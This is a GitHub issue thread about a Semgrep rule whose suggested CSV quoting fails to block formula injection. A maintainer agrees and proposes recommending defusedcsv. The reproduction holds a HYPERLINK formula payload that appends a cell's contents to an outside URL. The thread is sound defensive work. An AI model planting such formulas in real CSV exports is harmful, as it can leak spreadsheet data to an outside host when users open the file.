### ISSUE TITLE
unquoted-csv-writer rule Repair suggestions still have problems

### ISSUE THREAD

**Issue by yangyang-zhang** [returntocorp/sgrep-rules#2351]
**Describe the bug**
unquoted-csv-writer rule, When I use the recommended writing method, the generated CSV is still unsafe. What did I do wrong
<img width="760" alt="image" src="https://user-images.githubusercontent.com/16460777/186625915-14e55074-ec49-42a0-a7e5-74e728b5c6f0.png">

**To Reproduce**
`import csv

datas = [["zhangsan","lisi", "=HYPERLINK(\"http://www.baidu.com/\"&A1,\"Click\")"]]

with open('test2.csv', 'w') as f:
    writer = csv.writer(f,   delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
    writer.writerows(datas)`
**Expected behavior**
CSV should display text instead of hyperlink
<img width="612" alt="image" src="https://user-images.githubusercontent.com/16460777/186625817-56e32a6a-9f53-480c-80dd-528f6a8382cf.png">

**Comment by minusworld** [comment]
Upon investigation, you are correct that this doesn't mitigate injection of formulas.

I did some reading, and [Google's stance](https://bughunters.google.com/learn/invalid-reports/google-products/4965108570390528/csv-formula-injection) is that this is actually up to the ingesting program to mitigate. I tested this on Google Sheets and there is a checkbox that is checked (by default, sadly) that permits or denies the parsing of formulas.

There is [a project](https://github.com/raphaelm/defusedcsv), `defusedcsv` which escapes formula characters when generating CSVs. This is probably the correct solution now, so I am going to deprecate the `unquoted-csv-writer` in favor of a new rule that suggests the use of `defusedcsv`.
